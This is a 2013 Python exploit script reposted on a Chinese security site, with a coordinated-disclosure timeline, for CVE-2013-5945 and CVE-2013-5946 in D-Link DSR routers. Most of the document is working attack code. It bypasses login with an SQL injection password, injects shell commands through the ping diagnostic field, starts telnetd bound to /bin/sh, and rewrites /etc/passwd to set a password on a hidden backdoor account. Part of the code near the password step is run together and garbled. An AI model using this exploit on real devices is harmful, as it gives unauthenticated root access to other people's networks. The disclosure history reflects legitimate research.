首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Link DSR Router Remote Root Shell
来源:nu11.nu11 [at] yahoo.com 作者:0_o 发布时间:2013-12-09  
#!/usr/bin/python
#
# CVEs:                  CVE-2013-5945 - Authentication Bypass by SQL-Injection
#                        CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution
#
# Vulnerable Routers:    D-Link DSR-150 (Firmware < v1.08B44)
#                        D-Link DSR-150N (Firmware < v1.05B64)
#                        D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)
#                        D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)
#                        D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)
#
# Likely to work on:     D-Link DWC-1000
#
# Download URL:          http://tsd.dlink.com.tw
#
# Arch:                  mips and armv6l, Linux
#
# Author:                0_o -- null_null
#                        nu11.nu11 [at] yahoo.com
#                        Oh, and it is n-u-one-one.n-u-one-one, no l's...
#                        Wonder how the guys at packet storm could get this wrong :(
#
# Date:                  2013-08-18
#
# Purpose:               Get a non-persistent root shell on your D-Link DSR.
#
# Prerequisites:         Network access to the router ports 443 and 23.
#                        !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!
#
#
# Coordinated Disclosure -- history and timeline:
#
# 2013-09-12:   Informed Heise Security and asked for their support on this case
# 2013-09-13:   Informed the manufacturer D-Link via
#               http://www.dlink.com/us/en/support/security-advisories/report-vulnerabilities/  (contact form is buggy!)
#               http://www.d-link.co.za/contactus/feedback/ (contact request submitted)
#               http://www.dlink.com/de/de/contact-d-link (contact form is buggy!)
#               mail@dlink.ru (contact request sent)
#               info@dlink.ee (contact request sent)
#               info@dlink.de (contact request sent)
# 2013-09-14:   Informed the German Federal Office for Information Security (BSI) via certbund@bsi.bund.de 
# 2013-09-16:   D-Link Russia and D-Link Germany claim to have forwarded my request.
# 2013-09-17:   German BSI responds, contact established.
# 2013-09-24:   Requested CVE-IDs.
# 2013-09-25:   Heise responds, contact established.
# 2013-09-27:   D-Link asks for details on vulns and the exploit code.
#               Mitre assigns two CVEs:
#                  CVE-2013-5945 -- authentication bypass
#                  CVE-2013-5946 -- privilege escalation
# 2013-09-30:   D-Link has received the exploit and documentation via BSI
# 2013-11-29:   Patches are available for the DSR router series via tsd.dlink.com.tw
#                 DSR-150:                Firmware v1.08B44
#                 DSR-150N:               Firmware v1.05B64
#                 DSR-250 and DSR-250N:   Firmware v1.08B44
#                 DSR-500 and DSR-500N:   Firmware v1.08B77
#                 DSR-1000 and DSR-1000N: Firmware v1.08B77
# 2013-12-03:   Public Disclosure
#
# And now - the fun part :-)
#
 
 
import httplib
import urllib
import telnetlib
import time
import sys
import crypt
import random
import string
 
 
##############################
#
# CHANGE THESE VALUES -- BEGIN
#
# Your router's IP:PORT
ipaddr = "192.168.10.1:443"
# Password to be set (by this hack) on the backdoor account
bdpasswd = "password"
#
# CHANGE THESE VALUES -- END
#
# persistent config file:    /tmp/teamf1.cfg.ascii
#                            Edit this file to make your changes persistent.
#
##############################
 
 
cookie = ""
pid = -2
bduser = ""
     
 
def request(m = "", u = "", b = "", h = ""):
    global ipaddr
    conn = httplib.HTTPSConnection(ipaddr, timeout = 15)
    assert m in ["GET", "POST"]
    conn.request(method = m, url = u, body = b, headers = h)
    ret = conn.getresponse()
    header = ret.getheaders()
    data = ret.read()
    conn.close()
    return (header, data)
 
 
def login(user, passwd):
    global ipaddr
    headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               'User-Agent': "Exploit",
               'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
               'Content-Type': "application/x-www-form-urlencoded"}
    body = {'thispage'                          : "index.htm",
            'Users.UserName'                    : user,
            'Users.Password'                    : passwd,
            'button.login.Users.deviceStatus'   : "Login",
            'Login.userAgent'                   : "Exploit"}
    return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)
     
     
def logout():
    global ipaddr, cookie
    headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               'User-Agent': "Exploit",
               'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
               'Content-Type': "application/x-www-form-urlencoded"}
    body = ""
    return request("GET", "/scgi-bin/platform.cgi?page=index.htm", urllib.urlencode(body), headers)
 
 
def execCmd(cmd = None):
    global ipaddr, cookie
    assert cmd != None
    headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               'User-Agent': "Exploit",
               'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi?page=systemCheck.htm",
               'Cookie': cookie,
               'Content-Type': "application/x-www-form-urlencoded"}
    body = {'thispage'                          : "systemCheck.htm",
            'ping.ip'                           : "localhost;" + cmd,
            'button.traceroute.diagDisplay'     : "Traceroute"}
    return request("POST", "/scgi-bin/platform.cgi", urllib.urlencode(body), headers)
 
 
def findPid(mystr = None):
    # "  957 root      2700 S    /usr/sbin/telnetd -l /bin/login"
    assert mystr != None
    mypid = 0
    (h, d) = execCmd(cmd = "ps|grep telnetd|grep -v grep");
    s = d.find(mystr)
    if s > 0:
        # telnetd is running
        cand = d[s - 50 : s]
        try:
            mypid = int(cand.split("\n")[1].split()[0])
        except IndexError:
            mypid = int(cand.split(">")[1].split()[0])
    return mypid
 
 
def restartTelnetd(mystr1 = None, mystr2 = None):
    assert mystr1 != None and mystr2 != None
    global pid
    pid = findPid("telnetd -l /bin/")
    if pid > 0:
        # Stopping the running telnetd
        print "[+] Stopping telnetd (" + str(pid) + "): ",
        sys.stdout.flush()
        (h, d) = execCmd("kill " + str(pid))
        pid = findPid(mystr1)
        if pid > 0:
            print "FAILURE"
            sys.exit(-1)
        else:
            print "OK"
    # Starting a new telnetd
    print "[+] Starting telnetd: ",
    sys.stdout.flush()
    (h, d) = execCmd("telnetd -l " + mystr2)
    pid = findPid("telnetd -l " + mystr2)
    if pid > 0:
        print "OK (" + str(pid) + ")"
    else:
        print "FAILURE"
        sys.exit(-1)
     
 
def main():
    global ipaddr, cookie, pid, bduser, bdpasswd
    user = "admin"
    passwd = "' or 'a'='a"
    print "\n\nPrivilege Escalation exploit for D-Link DSR-250N (and maybe other routers)"
    print "This change is non-persistent to device reboots."
    print "Created and coded by 0_o (nu11.nu11 [at] yahoo.com)\n\n"
    # Logging into the router
    print "[+] Trying to log into the router: ",
    sys.stdout.flush()
    (h, d) = login(user, passwd)
    if d.find("User already logged in") > 0:
        print "FAILURE"
        print "[-] The user \"admin\" is still logged in. Please log out from your current session first."
        sys.exit(-1)
    elif d.find('<a href="?page=index.htm">Logout</a>') > 0:
        while h:
            (c1, c2) = h.pop()
            if c1 == 'set-cookie':
                cookie = c2
                break
        print "OK (" + cookie + ")"
    elif d.find("Invalid username or password") > 0:
        print "FAILURE"
        print "[-] Invalid username or password"
        sys.exit(-1)
    else:
        print "FAILURE"
        print "[-] Unable to login."
        sys.exit(-1)
         
    # Starting a telnetd with custom parameters
    print "[+] Preparing the hack..."
    restartTelnetd("/bin/login", "/bin/sh")
     
    # Do the h4cK
    print "[+] Hacking the router..."
    print "[+] Getting the backdoor user name: ",
    sys.stdout.flush()
    tn = telnetlib.Telnet(ipaddr.split(":")[0])
    tn.read_very_eager()
    tn.write("cat /etc/profile\n")
    time.sleep(5)
    data = tn.read_very_eager()
    for i in data.split("\n"):
        if i.find('"$USER"') > 0:
            bduser = i.split('"')[3]
            break
    if len(bduser) > 0:
        print "OK (" + bduser + ")"
    else:
        print "FAILURE"
        sys.exit(-1)
    print "[+] Setting the new password for " + bduser + ": ",
    sys.stdout.flush()
    tn.write("cat /etc/passwd\n")
    time.sleep(5)
    data = tn.read_very_eager()
    data = data.split("\n")
    data.reverse()
    data.pop()
    data.reverse()
    data.pop()
    data = "\n".join(data)
    for i in data.split("\n"):
        if i.find(bduser) >= 0:
            line = i.split(':')
            s1 = string.lowercase + string.uppercase + string.digits
            salt = ''.join(random.sample(s1,2))
            pw = crypt.crypt(bdpasswd, salt)
            line[1] = pw
            # doesn't work for some odd reason -- too lazy to find out why
            #salt = ''.join(random.sample(s1,8))
            #line[1] = crypt.crypt(bdpasswd, '$1
+ salt + ' ) data = data.replace(i, ":".join(line)) break tn.write('echo -en "" > /etc/passwd\n') time.sleep(5) for i in data.split("\n"): tn.write('echo -en \'' + i + '\n\' >> /etc/passwd\n') time.sleep(1) data = tn.read_very_eager() tn.close() if data.find(pw) >= 0: print "OK (" + pw + ")" success = True else: print "FAILURE" print "[-] Could not set the new password." sys.exit(-1) # Switching back to the originals print "[+] Mobbing up..." restartTelnetd("/bin/sh", "/bin/login") # Logging out print "[+] Logging out: ", sys.stdout.flush() (h, d) = logout() if d.find('value="Login"') > 0: print "OK" else: print "FAILURE" print "[-] Unable to determine if user is logged out." # Print success message if success: print "[+] You can now log in via SSH and Telnet by using:" print " user: " + bduser print " pass: " + bdpasswd print " These changes will be reverted upon router reboot." print " Edit \"/tmp/teamf1.cfg.ascii\" to make your changes persistent." main() sys.exit(0)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Steinberg MyMp3PRO 5.0 - Buffe
·Eaton Network Shutdown Module
·Joomla Hotornot2 Shell Upload
·Up.Time Monitoring Station pos
·Kaseya uploadImage Arbitrary F
·ad GOM Player 2.2.53.5169 - SE
·OpenSSL Denial Of Service
·vBulletin index.php/ajax/api/r
·D-Link DIR-XXX Remote Root Acc
·HP LoadRunner EmulationAdmin W
·TP-Link 150M Wireless Lite N R
·Adobe ColdFusion 9 Administrat
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved